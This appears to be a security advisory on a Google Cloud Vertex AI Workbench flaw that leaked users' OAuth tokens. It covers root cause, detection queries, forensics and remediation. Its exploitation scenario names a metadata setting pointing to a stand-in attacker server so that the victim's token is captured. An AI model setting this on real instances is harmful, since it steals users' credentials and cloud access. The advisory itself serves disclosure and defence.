Google Cloud Vertex AI Workbench – Privilege Escalation via Credential Exposure
CVE ID: CVE-2026-2244
Product: Google Cloud Vertex AI Workbench
Vulnerability Type: Improper Access Control / Credential Exposure
Impact: Cross-tenant privilege escalation and account takeover
CVSS Score: 8.4 (High)
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: Required
Exploit Availability: Publicly disclosed proof-of-concept (for research/educational purposes)
Affected Versions: Workbench instances created between July 21, 2025 and January 30, 2026
Fixed Version: Instances created or updated after January 30, 2026
Official Patch / Release Notes: Link provided below
Technical Description
CVE-2026-2244 affects Google Cloud Vertex AI Workbench instances configured in Single User mode with managed End User Credentials (EUC).
In this configuration, when a user clicks “Open JupyterLab,” their OAuth access token is temporarily injected into the virtual machine’s metadata so the notebook can act on behalf of that user.
The issue arises from insufficient restrictions around instance metadata keys and a built-in startup script (runtime-config-post-result) that executes during specific lifecycle events such as upgrades. A metadata attribute named status-config-url could be set to an arbitrary external endpoint. When the startup script executed, it sent a status request to the URL defined in metadata.
Under vulnerable conditions, this request could include authentication material associated with the user session. If that URL pointed to an attacker-controlled server, the victim’s OAuth token could be captured.
Once obtained, that token could be used to perform API calls against Google Cloud services with the same permissions as the victim.
The vulnerability effectively allowed:
- Cross-tenant credential theft
- Privilege escalation
- Unauthorized access to cloud resources
- Potential lateral movement within GCP
Root Cause
The vulnerability was caused by a combination of:
- Overly permissive handling of custom metadata attributes.
- Lack of validation on the
status-config-urlmetadata field. - A startup script capable of transmitting status information externally.
- Injection of end-user OAuth tokens into instance metadata.
- Re-execution of startup scripts during instance upgrade events.
The core issue was improper access control over sensitive runtime behavior.
Exploitation Scenario (Educational)
The exploitation flow typically involved:
- A malicious user creating a Vertex AI Workbench instance.
- Enabling Single User mode and specifying the target victim’s email.
- Setting a metadata key: status-config-url = https://attacker-controlled-server.com
- Convincing the victim to click “Open JupyterLab.”
- Triggering an instance upgrade or lifecycle event.
- The startup script executing and sending a request to the attacker’s server.
- The attacker capturing the OAuth token from HTTP request headers.
With the stolen token, the attacker could:
- Access GCP APIs as the victim.
- Read or modify storage buckets.
- Deploy resources.
- Access AI models or datasets.
- Escalate further depending on IAM permissions.
No sophisticated exploit tooling was required. The attack relied on cloud configuration abuse rather than memory corruption or binary exploitation.
Impact Assessment
If exploited successfully:
- Full API access within victim’s permission scope.
- Data exfiltration from GCS buckets.
- Unauthorized VM creation or modification.
- Service account abuse.
- Cross-project and potentially cross-organization impact.
- Temporary account takeover until token expiration or revocation.
Because OAuth tokens were involved, the impact depended on token scope and lifetime.
MITRE ATT&CK Mapping
- T1552.001 – Credentials from Cloud Services
- T1078 – Valid Accounts
- T1041 – Exfiltration Over Web Services
- T1537 – Transfer Data to Cloud Account
- CWE-200 – Exposure of Sensitive Information
Indicators of Compromise (IOCs)
Investigations should focus on:
- Presence of metadata key:
status-config-url - Outbound HTTP requests from notebook instances to unknown domains
- API calls performed using unusual IP addresses
- Instances configured with Single User set to unexpected emails
- Repeated instance upgrades shortly after JupyterLab access
Log Sources for Detection
The following log sources are critical:
- Google Cloud Audit Logs (Admin Activity)
- Data Access Logs
- Compute Engine Metadata Change Logs
- VPC Flow Logs
- Cloud NAT Logs
- Proxy / Egress Gateway Logs
- OS-level logs from notebook VM instances
Detection Rules and Queries
1. Detect Suspicious Metadata Changes
Log Source: Cloud Audit Logs
Filter:
protoPayload.methodName="v1.compute.instances.setMetadata"
protoPayload.request.metadata.items.key="status-config-url"
Alert when this metadata key appears on any Vertex AI Workbench instance.
2. Detect Metadata Changes Combined with Single User Mode
resource.type="gce_instance"
protoPayload.methodName="v1.compute.instances.setMetadata"
protoPayload.request.metadata.items.key="status-config-url"
protoPayload.request.labels."notebooks.googleapis.com/user-email" != ""
This indicates targeting of a specific user.
3. Detect Outbound Token Exfiltration
Log Source: Proxy / Firewall Logs
Search for:
http.request.headers.authorization:"Bearer "
AND source.instance.name:"vertex"
or
jsonPayload.headers.authorization=~"Bearer .*"
Any external HTTP request carrying a Bearer token from notebook instances should be treated as suspicious.
4. Detect Unusual API Usage by Victim Identity
protoPayload.authenticationInfo.principalEmail="[email protected]"
NOT protoPayload.requestMetadata.callerIp IN (expected corporate IP ranges)
This helps identify token abuse from attacker infrastructure.
5. Detect Instance Upgrade Trigger Abuse
protoPayload.methodName="v1.compute.instances.update"
protoPayload.request.tags.items:"upgrade"
Correlate this with metadata modifications within a short timeframe.
Forensic Investigation Steps
- Identify all Workbench instances created between July 21, 2025 and January 30, 2026.
- Extract metadata configuration history.
- Search audit logs for
status-config-url. - Review outbound HTTP logs during instance startup events.
- Rotate all OAuth tokens for users who accessed vulnerable instances.
- Review IAM changes performed during suspected compromise window.
Remediation
Google addressed the issue by:
- Removing or restricting the vulnerable startup script behavior.
- Preventing untrusted metadata fields from being abused.
- Blocking unsafe configurations in the control plane.
All affected instances should be upgraded or recreated using patched images.
Official Patch / Upgrade Link:
https://docs.cloud.google.com/vertex-ai/docs/workbench/release-notes#February_20_2026
Mitigation Recommendations
Until patch verification is completed:
- Restrict permissions to create or modify Workbench instances.
- Disable Single User mode where not required.
- Enforce egress filtering on notebook VMs.
- Block outbound traffic to unknown domains.
- Monitor metadata write operations in real time.
- Implement least privilege IAM policies.
- Enable VPC Service Controls where applicable.
Security Hardening Recommendations
- Enforce metadata allowlists.
- Require approval workflows for notebook instance creation.
- Centralize outbound HTTP inspection.
- Monitor OAuth token usage anomalies.
- Reduce token lifetime via IAM policy where feasible.
- Deploy Cloud IDS for anomaly detection.
Risk Evaluation
This vulnerability does not require complex exploitation techniques. It leverages trust assumptions in cloud orchestration components. Because exploitation depends on convincing a victim to access a notebook instance, the attack surface includes social engineering.
Organizations with multi-tenant GCP environments or shared AI infrastructure face elevated risk.
Immediate validation of patch status and retrospective log analysis are strongly recommended.
